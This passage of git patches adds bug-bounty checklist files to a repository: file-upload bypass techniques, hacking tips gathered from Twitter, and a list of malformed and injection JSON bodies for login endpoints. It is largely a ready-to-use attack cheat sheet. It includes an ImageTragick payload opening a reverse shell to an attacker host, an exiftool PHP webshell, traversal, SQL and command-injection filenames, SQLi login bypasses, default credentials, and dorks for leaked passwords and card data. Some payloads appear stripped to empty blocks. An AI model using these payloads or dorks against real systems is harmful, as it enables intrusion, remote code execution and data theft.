"cc number, cvv, email, phone number" -``` - -[ ] Tip 18 -Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox: -``` -cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403 -``` - -[ ] Tip 19 -``` -Tip : "GET request for XML not found" changes the request to POST with XXE payload -``` - -[ ] Tip 20 -Extract Juicy Info From AlienVault -``` -for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done -``` - -[ ] Tip 21 -bypass PHPMYADMIN -``` -phpmyadmin =>301 -PHPmyadmin =>200 -PHPMYadmin =>200 -PHPMYADMIN =>200 -phpMYadmin =>200 -phpmyAdmin =>200 -``` - - -[ ] Tip 22 -SVN -``` -1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403 -2. found http://url.com/.svn/ -3. clone & use https://github.com/anantshri/svn-extractor -4. ./svn-extractor.py --url http://url.com --match database.php -5. result in output dir and just open it -``` - -[ ] Tip 23 -xss -``` -in : -firstname: - -========================== -1:- Use https://github.com/Leoid/MatchandReplace -2:- Import to burpsuite match and replace. -3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 -4:- The Blind xss payload will added automatically by burp and gospider. -Finally:- 4 BLIND XSS REPORTS. - -``` -[ ] Tip 24 -Cookie Bomb -``` -URL that causes the cookie length to exceed request header limits for all requests until the cookie expires. -1. Find a Cookie set by a parameter -2. Inject as many commas as you can into the parameter until you DoS that user -``` - -[ ] Tip 25 -xss via jwt -``` -1. Make a jwt token and insert a xss paylaod. -2. The final url is like url/dest?jwt=vulnerable-jwt-token. -(jwt= paramter was decoding the provided jwt token and show's it into the page). -``` - -[ ] Tip 26 -Getting Private Information URLs by curling -``` -1. Grab all URLs from your target which you think hard to hunt or test or static -2. Save all files in any.txt -3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done -4. All curled response grep for following -Keywords: -drive. google -docs. google -/spreadsheets/d/ -/document/d/ -NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later -You will get URLs includes juicy information -``` - -[ ] Tip 26 -Injecting Payload In Phone Numbers field -``` -https://twitter.com/Pwn2arn/status/1609146484263641089 -``` - -[ ] Tip 27 -Easy P1 upside_down_face -``` -1: Collect all the Js files by using the developer tool on mozila -2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool -3: Now check manually sensitive keyword js file -``` - -[ ] Tip 28 -Tips for my last P1 : -``` -1 - Found dev portal for developing require Basic Auth -2 - search in GitHub "domain" docker -3- found a user try to pull the privite repository and passing the username:pass -4 - Decode Base64 Basic Auth -5 - Logged in and full access on all Prod - -``` - -[ ] Tip 29 -Github leak for Aws,jira,okta etc -``` -1. Org:"target" pwd/pass/passwd/password -2. "target. atlassian" pwd/pass/passwd/password -3. "target. okta" pwd/pass/passwd/password -4. "Jira. target" pwd/pass/passwd/password -``` - -[ ] Tip 30 -soucremap js -``` -https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f -https://github.com/rarecoil/unwebpack-sourcemap - -``` - -[ ] Tip 31 -if a site uses AngularJS, -``` -test {{7*7}} to see whether 49 is rendered anywhere. -If the application is built with ASP.NET with XSS protection -enabled, you might want to focus on testing other vulnerability -types first and check for XSS as a last resort. - -AngularJS Client-Side Template Injection -https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE - -``` - -[ ] Tip 32 -If a site is built with Rails, -``` -you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the -RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern -www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing -insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook. - -``` - From 44b4e9b448d763f0c0ee4b9f3f77466b0198d2e5 Mon Sep 17 00:00:00 2001 From: Maksim Partsiankou Date: Tue, 10 Dec 2024 19:24:28 +0100 Subject: [PATCH 2/3] return deleted files --- File Upload/File Upload.md | 239 ++++++++++++++++++++++ tips from twitter/tips_twitter.md | 324 ++++++++++++++++++++++++++++++ 2 files changed, 563 insertions(+) create mode 100644 File Upload/File Upload.md create mode 100644 tips from twitter/tips_twitter.md diff --git a/File Upload/File Upload.md b/File Upload/File Upload.md new file mode 100644 index 0000000..6582f18 --- /dev/null +++ b/File Upload/File Upload.md @@ -0,0 +1,239 @@ +## Where to find +In upload file feature, for example upload photo profile feature + +## How to exploit +read also this pdf it contain a many of ideas +1-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File-Upload.pdf by`0xAwali` +2-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/Slides(1).pdf by`ebrahim hegazy` + +1. Change the `Content-Type` value +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` +Change the Content-Type +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/jpeg +``` + +2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" +Content-Type: application/x-php +``` +Change the request to this +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` + +3. Upload the payload, but start with GIF89a; and +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +... + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/gif + +GIF89a; +``` +And don't forget to change the content-type to image/gif + +4. Bypass content length validation, it can be bypassed using small payload +``` +() +``` + +5. Using null byte in filename +``` +file.php%00.gif +``` + +6. Using double extensions for the uploaded file +``` +file.jpg.php +``` + +7. Uploading an unpopular php extensions (php4,php5,php6,phtml) +``` +file.php5 +``` + +8. Try to randomly capitalizes the file extension +``` +file.pHP5 +``` + +9. Mix the tips! + + +- Upload Function + - Extensions Impact + - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE + - `SVG`: Stored XSS, SSRF, XXE + - `GIF`: Stored XSS, SSRF + - `CSV`: CSV injection + - `XML`: XXE + - `AVI`: LFI, SSRF + - `HTML`, `JS` : HTML injection, XSS, Open redirect + - `PNG`, `JPEG`: Pixel flood attack (DoS) + - `ZIP`: RCE via LFI, DoS + - `PDF`, `PPTX`: SSRF, BLIND XXE + - Blacklisting Bypass + - PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc` + - ASP → `asp`, `.aspx`, `.cer`, `.asa` + - Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf` + - Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm` + - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr` + - Whitelisting Bypass + - `file.jpg.php` + - `file.php.jpg` + - `file.php.blah123jpg` + - `file.php%00.jpg` + - `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00. + - `file.php%00` + - `file.php%20` + - `file.php%0d%0a.jpg` + - `file.php.....` + - `file.php/` + - `file.php.\` + - `file.php#.png` + - `file.` + - `.html` + - Vulnerabilities + - [ ] Directory Traversal + - Set filename `../../etc/passwd/logo.png` + - Set filename `../../../logo.png` as it might changed the website logo. + - [ ] SQL Injection + - Set filename `'sleep(10).jpg`. + - Set filename `sleep(10)-- -.jpg`. + - [ ] Command Injection + - Set filename `; sleep 10;` + - [ ] SSRF + - Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor. + - SSRF Through `.svg` file. + + ```php + + ``` + + - [ ] ImageTragic + + ``` + push graphic-context + viewbox 0 0 640 480 + fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' + pop graphic-context + ``` + + - [ ] XXE + - Upload using `.svg` file + + ```xml + + ]> + + &xxe; + + ``` + + ```xml + + + + ``` + + - Using excel file + - [ ] XSS + - Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg"` + - Upload using `.gif` file + + ``` + GIF89a/**/=alert(document.domain)//; + ``` + + - Upload using `.svg` file + + ```xml + + ``` + + ```xml + + + + + + + + ``` + + - [ ] Open Redirect + 1. Upload using `.svg` file + + ```xml + + + + + + + ``` + + - Content-ish Bypass + - [ ] Content-type validation + - Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream` + to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`. + - [ ] Content-Length validation + - Small PHP Shell + + ```php + () + ``` + + - [ ] Content Bypass Shell + - If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` ) + + ```php + GIF89a; + ``` + + - Misc + - [ ] Uploading `file.js` & `file.config` (web.config) + - [ ] Pixel flood attack using image + - [ ] DoS with a large values name: `1234...99.png` + - [ ] Zip Slip + - If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php` + - [ ] Image Shell + - Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg` + + ```php + exiftool -Comment='"; system($_GET['cmd']); ?>' pic.jpg + ``` diff --git a/tips from twitter/tips_twitter.md b/tips from twitter/tips_twitter.md new file mode 100644 index 0000000..c5cce6f --- /dev/null +++ b/tips from twitter/tips_twitter.md @@ -0,0 +1,324 @@ +[ ] Tip 1 +``` +Here’s my last finding (P1) +1- register account +2- intercept request +3- here’s the response in image so in “role” parameter we have ROLE_USER +So i don’t know what i can replace it to privilege my account to admin +4- open source code and look in js files +5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role” +6- so i use match and replace to replace value’s +7- boom privilege my account to admin account with full control +``` +[ ] Tip 2 +``` +اسعد الله ايامكم بكل خير + +هذا ثغرة في شركة مايكروسوفت +كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS + +Exploit: +https//anywebsite.com/c:/Windows/Win.ini +``` + +[ ] Tip 3 +``` +CloudFront bypass:⚔️ + +">%0D%0A%0D%0A + +Would be interested to know if this is target specific or other CloudFront websites are vulnerable +``` + +[ ] Tip 4 + +``` +1 : Get all the URL from wayback / Gau +2 : Filter out the js file using httpx +3 : Check Manually all the js file or you can use nuclei template or used @trufflesec chrome extension +``` +[ ] Tip 5 +``` +target.com/wp-config.php => 404 not found +target.com/wp-config.php.… ==> 200 ok and downloaded +wp-config.php.swp ==>>200 ok + +after that if its contain encoded using hexadecimal decode it . +``` + +[ ] Tip 6 +``` +try testing for SQLi Authentication Bypass :⚔️ +username:'--'/"--" +password:'--'/"--" +``` +[ ] Tip 7 +``` +default credentials: +PSADMIN:PSADMIN +PS:PS +PSEM:PSEM +Google Dork: intitle:"Oracle+PeopleSoft+Sign-in" +Wrote a nuclei template to test all permutations +``` +[ ] Tip 8 +``` +nmap -sV -iL host.txt -oN nmap_scan.txt +Wait a few hours +cat nmap_scan.txt | grep open +``` + +[ ] Tip 9 +```Bybass cloudfaire with cynses search +https://youtu.be/VsM6ERUx_AA +------------------------------------------ +------------------------------------------ +Xss payload +https://github.com/Aacle/xss_payload +------------------------------------------ +------------------------------------------ +Use Nuclei for leaked api. +$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken} +------------------------------------------ +------------------------------------------ +#Scan through #TOR +sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5 +------------------------------------------ +------------------------------------------ +Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token, +and check access to each repo of main organization + +------------------------------------------ +------------------------------------------ + +bypass alert ==> [alert][0].call(this,1) +------------------------------------------ +------------------------------------------ +``` + +[ ] Tip 10 +``` +1_ Go to SHODAN and get the IP +2 _ Go to Dirsearch and do a Fuzzing +3_ Obtaining sensitive data +``` +[ ] Tip 11 +``` +Recon Recon Recon!! +Shodan Dorking Always wins. + +ssl:"Company Inc" +Filter results by http title. +Start fuzzing an interesting asset. +Found swagger-ui/ +Tried swagger ui xss with +https://github.com/seanmarpo/webjars-swagger-xss +``` +[ ] Tip 12 +``` +Have you ever heard about wc-db file disclosure?! + +> you can check it by: +https://target[.]com/.svn/wc.db + +> then you can use this tool to dump all of the website source code + +https://github.com/anantshri/svn-extractor +``` + +[ ] Tip 13 +``` +1. Shodan Dork -> Some Assets. +2. Fuzzing & got 403 Forbidden on /config dir. +3. Fuzzing on /config/FUZZ and getting some config files. +4. Same pattern and it works on another asset. +``` + +[ ] Tip 14 +``` + +Default Credentials admin:admin +- shodan dork : +- ssl:"target[.]com" 200 http.title:"dashboard" + +``` +[ ] Tip 15 + + +A quick thread about JIRA misconfiguration that I tried today. +``` +3. Google dorks to find jira dashboards. + +inurl:/ConfigurePortalPages!default.jspa?view=popular +``` +``` +4. Google dork to find jira filters page. + +inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) +``` + +[ ] Tip 16 +``` +5. Google dork to find the exposed user list. + +inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log +``` + +[ ] Tip 17 +``` +GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information +dork: "org:company extension:csv admin" +leak: "cc number, cvv, email, phone number" +``` + +[ ] Tip 18 +Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox: +``` +cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403 +``` + +[ ] Tip 19 +``` +Tip : "GET request for XML not found" changes the request to POST with XXE payload +``` + +[ ] Tip 20 +Extract Juicy Info From AlienVault +``` +for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done +``` + +[ ] Tip 21 +bypass PHPMYADMIN +``` +phpmyadmin =>301 +PHPmyadmin =>200 +PHPMYadmin =>200 +PHPMYADMIN =>200 +phpMYadmin =>200 +phpmyAdmin =>200 +``` + + +[ ] Tip 22 +SVN +``` +1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403 +2. found http://url.com/.svn/ +3. clone & use https://github.com/anantshri/svn-extractor +4. ./svn-extractor.py --url http://url.com --match database.php +5. result in output dir and just open it +``` + +[ ] Tip 23 +xss +``` +in : +firstname: + +========================== +1:- Use https://github.com/Leoid/MatchandReplace +2:- Import to burpsuite match and replace. +3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 +4:- The Blind xss payload will added automatically by burp and gospider. +Finally:- 4 BLIND XSS REPORTS. + +``` +[ ] Tip 24 +Cookie Bomb +``` +URL that causes the cookie length to exceed request header limits for all requests until the cookie expires. +1. Find a Cookie set by a parameter +2. Inject as many commas as you can into the parameter until you DoS that user +``` + +[ ] Tip 25 +xss via jwt +``` +1. Make a jwt token and insert a xss payload. +2. The final url is like url/dest?jwt=vulnerable-jwt-token. +(jwt= parameter was decoding the provided jwt token and show's it into the page). +``` + +[ ] Tip 26 +Getting Private Information URLs by curling +``` +1. Grab all URLs from your target which you think hard to hunt or test or static +2. Save all files in any.txt +3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done +4. All curled response grep for following +Keywords: +drive. google +docs. google +/spreadsheets/d/ +/document/d/ +NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later +You will get URLs includes juicy information +``` + +[ ] Tip 26 +Injecting Payload In Phone Numbers field +``` +https://twitter.com/Pwn2arn/status/1609146484263641089 +``` + +[ ] Tip 27 +Easy P1 upside_down_face +``` +1: Collect all the Js files by using the developer tool on mozilla +2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool +3: Now check manually sensitive keyword js file +``` + +[ ] Tip 28 +Tips for my last P1 : +``` +1 - Found dev portal for developing require Basic Auth +2 - search in GitHub "domain" docker +3- found a user try to pull the private repository and passing the username:pass +4 - Decode Base64 Basic Auth +5 - Logged in and full access on all Prod + +``` + +[ ] Tip 29 +Github leak for Aws,jira,okta etc +``` +1. Org:"target" pwd/pass/passwd/password +2. "target. atlassian" pwd/pass/passwd/password +3. "target. okta" pwd/pass/passwd/password +4. "Jira. target" pwd/pass/passwd/password +``` + +[ ] Tip 30 +sourcemap js +``` +https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f +https://github.com/rarecoil/unwebpack-sourcemap + +``` + +[ ] Tip 31 +if a site uses AngularJS, +``` +test {{7*7}} to see whether 49 is rendered anywhere. +If the application is built with ASP.NET with XSS protection +enabled, you might want to focus on testing other vulnerability +types first and check for XSS as a last resort. + +AngularJS Client-Side Template Injection +https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE + +``` + +[ ] Tip 32 +If a site is built with Rails, +``` +you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the +RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern +www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing +insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook. + +``` From 385a87c82f3fac712249b0942f9c7a3571540b97 Mon Sep 17 00:00:00 2001 From: Maksim Partsiankou Date: Tue, 10 Dec 2024 19:29:53 +0100 Subject: [PATCH 3/3] return api auth file --- Api Authentication/Authentication.md | 771 +++++++++++++++++++++++++++ 1 file changed, 771 insertions(+) create mode 100644 Api Authentication/Authentication.md diff --git a/Api Authentication/Authentication.md b/Api Authentication/Authentication.md new file mode 100644 index 0000000..fff721b --- /dev/null +++ b/Api Authentication/Authentication.md @@ -0,0 +1,771 @@ +97 JSON Tests for for Authentication Endpoints link pdf [link](https://www.linkedin.com/feed/update/urn:li:activity:7097279293608607746/) + +1. Basic credentials +``` +{ +"login": "admin", +"password": "admin" +} +``` + +2. Empty credentials: +``` +{ +"login": "", +"password": "" +} +``` + +3- Null values: +``` +{ +"login": null, +"password": null +} +``` + +4. Credentials as numbers: +``` +{ +"login": 123, +"password": 456 +} +``` + +6. Credentials as booleans: +``` +{ +"login": true, +"password": false +} +``` + +7. Credentials as arrays: +``` +{ +"login": ["admin"], +"password": ["password"] +} +``` + +8. Credentials as objects: +``` +{ +"login": {"username": "admin", +"password": {"password": "password"}} +} +``` + +9. Special characters in credentials: +``` +{ +"login": "@dm!n", +"password": "p@ssw0rd#" +} +``` + +10. SQL Injection: +``` +{ +"login": "admin' --", +"password": "password" +} +``` + +11. HTML tags in credentials: +``` +{ +"login": "

admin

", +"password": "ololo-HTML-XSS" +} +``` + +12. Unicode in credentials: +``` +{ +"login": "\u0061\u0064\u006D\u0069\u006E", +"password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064" +} +``` + +13. Credentials with escape characters: +``` +{ +"login": "ad\\nmin", +"password": "pa\\ssword" +} +``` + +14. Credentials with white space: +``` +{ +"login": " ", +"password": " " +} +``` + +15. Overlong values: +``` +{ +"login": "a"*10000, +"password": "b"*10000 +} + +``` +16. Malformed JSON (missing brace): +``` +{ +"login": "admin", +"password": "admin" +} +``` + +17. Malformed JSON (extra comma): +``` +{ +"login": "admin", +"password": "admin", +} +``` + +18. Missing login key: +``` +{ +"password": "admin" +} +``` + +19. Missing password key: +``` +{ +"login": "admin" +} +``` + +20. Swapped key values: +``` +{ +"admin": "login", +"password": "password" +} +``` + +21. Extra keys: +``` +{ +"login": "admin", +"password": "admin", +"extra": "extra" +} +``` + +22. Missing colon: +``` +{ +"login" "admin", +"password": "password" +} +``` + +23. Invalid Boolean as credentials: +``` +{ +"login": yes, +"password": no +} +``` + +25. All keys, no values: +``` +{ +"": "", +"": "" +} +``` + +26. Nested objects: +``` +{ +"login": {"innerLogin": "admin", +"password": {"innerPassword": "password"}} +} +``` +27. Case sensitivity testing: +``` +{ +"LOGIN": "admin", +"PASSWORD": "password" +} +``` + +28. Login as a number, password as a string: +``` +{ +"login": 1234, +"password": "password" +} +``` + +29. Login as a string, password as a number: +``` +{ +"login": "admin", +"password": 1234 +} +``` + +30. Repeated keys: +``` +{ +"login": "admin", +"login": "user", +"password": "password" +} +``` +31. Single quotes instead of double: +``` +{ +'login': 'admin', +'password': 'password' +} +``` +33. Login and password with only special characters: +``` +{ +"login": "@#$%^&*", +"password": "!@#$%^&*" +} +``` +34. Unicode escape sequence: +``` +{ +"login": "\u0041\u0044\u004D\u0049\u004E", +"password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044" +} +``` + +35. Value as object instead of string: +``` +{ +"login": {"$oid": +"507c7f79bcf86cd7994f6c0e"}, +"password": "password"} +} +``` + +37. Nonexistent variables as values: +``` +{ +"login": undefined, +"password": undefined +} +``` + +38. Extra nested objects: +``` +{ +"login": "admin", +"password": "password", +"extra": {"key1": "value1", +"key2": "value2"} +} + +``` + +39. Hexadecimal values: +``` +{ +"login": "0x1234", +"password": "0x5678" +} +``` + +40. Extra symbols after valid JSON: +``` +{ +"login": "admin", +"password": "password"}@@@@@@ +} +``` + +41. Only keys, without values: +``` +{ +"login":, +"password": +} +``` + +42. Insertion of control characters: +``` +{ +"login": "ad\u0000min", +"password": "pass\u0000word" +} +``` + +43. Long Unicode Strings: +``` +{ +"login": "\u0061"*10000, +"password": "\u0061"*10000 +} +``` + +44. Newline Characters in Strings: +``` +{ +"login": "ad\nmin", +"password": "pa\nssword" +} +``` + +45. Tab Characters in Strings: +``` +{ +"login": "ad\tmin", +"password": "pa\tssword" +} +``` + +46. Test with HTML content in Strings: +``` +{ +"login": "admin", +"password": "password" +} +``` + +47. JSON Injection in Strings: +``` +{ +"login": "{\"injection\":\"value\"}", +"password": "password" +} +``` + +48. Test with XML content in Strings: +``` +{ +"login": "admin", +"password": "password" +} +``` + +49. Combination of Number, Strings, and Special characters: +``` +{ +"login": "ad123min!@", +"password": "pa55w0rd!@" +} +``` + +50. Use of environment variables: +``` +{ +"login": "${USER}", +"password": "${PASS}" +} +``` + +51. Backslashes in Strings: +``` +{ +"login": "ad\\min", +"password": "pa\\ssword" +} +``` + +52. Long strings of special characters: +``` +{ +"login": "!@#$%^&*()"*1000, +"password": "!@#$%^&*()"*1000 +} +``` + +53. Empty Key in JSON: +``` +{ +"": "admin", +"password": "password" +} +``` + +55. JSON Injection in Key: +``` +{ +"{\"injection\":\"value\"} +": "admin", +"password": "password" +} +``` + +56. Quotation marks in strings: +``` +{ +"login": "\"admin\"", +"password": "\"password\"" +} +``` + +57. Credentials as nested arrays: +``` +{ +"login": [["admin"]], +"password": [["password"]] +} +``` + +58. Credentials as nested objects: +``` +{ +"login": {"username": {"value": "admin", +"password": {"password": {"value": +"password" +} +``` + +59. Keys as numbers: +``` +{ +123: "admin", +456: "password" +} +``` + +60. Testing with greater than and less than signs: +``` +{ +"login": "admin>1", +"password": "alert('hi')", +"password": "password" +} +``` + +85. Negative numbers as strings: +``` +{ +"login": "-123", +"password": "-456" +} +``` + +86. Values as URLs: +``` +{ +"login": "https://admin.com", +"password": "https://password.com" +} +``` + +87. Strings with email format: +``` +{ +"login": "admin@admin.com", +"password": "password@password.com" +} +``` +88. Strings with IP address format: +``` +{ +"login": "192.0.2.0", +"password": "203.0.113.0" +} +``` + +89. Strings with date format: +``` +{ +"login": "2023-08-03", +"password": "2023-08-04" +} +``` + +90. JSON with exponential values: +``` +{ +"login": 1e+30, +"password": 1e+30 +} +``` + +91. JSON with negative exponential values: +``` +{ +"login": -1e+30, +"password": -1e+30 +} +``` + +92. Using Zero Width Space (U+200B) in strings: +``` +{ +"login": "admin​", +"password": "password​" +} +``` + +93. Using Zero Width Joiner (U+200D) in strings: +``` +{ +"login": "adminâ€", +"password": "passwordâ€" +} +``` + +94. JSON with extremely large numbers: +``` +{ +"login": 12345678901234567890, +"password": 12345678901234567890 +} +``` + +95. Strings with backspace characters: +``` +{ +"login": "admin\b", +"password": "password\b" +} +``` + +96. Test with emoji in strings: +``` +{ +"login": "admin😀", +"password": "password😀" +} +``` + +97. JSON with comments, although they are not officially supported in JSON: +``` +{ +/*"login": "admin", +"password": "password"*/ +} +``` + +98. JSON with base64 encoded values: +``` +{ +"login": "YWRtaW4=", +"password": "cGFzc3dvcmQ=" +} +``` + +99. Including null byte character (may cause truncation): +``` +{ +"login": "admin\0", +"password": "password\0" +} +``` + +100. JSON with credentials in scientific notation: +``` +{ +"login": 1e100, +"password": 1e100 +} +``` + +102. Strings with octal values: +``` +{ +"login": "\141\144\155\151\156", +"password":"\160\141\163\163\167\157\162\144" +} +``` +103. writeup +``` +{ +root:{ +"username": "admin", +"password":"admin" +} +} +``` + +104. writeup +``` +basic => username=admin +username[]=admin +username[0]=admin +username=admin&username=admin +delete username=admin + +``` \ No newline at end of file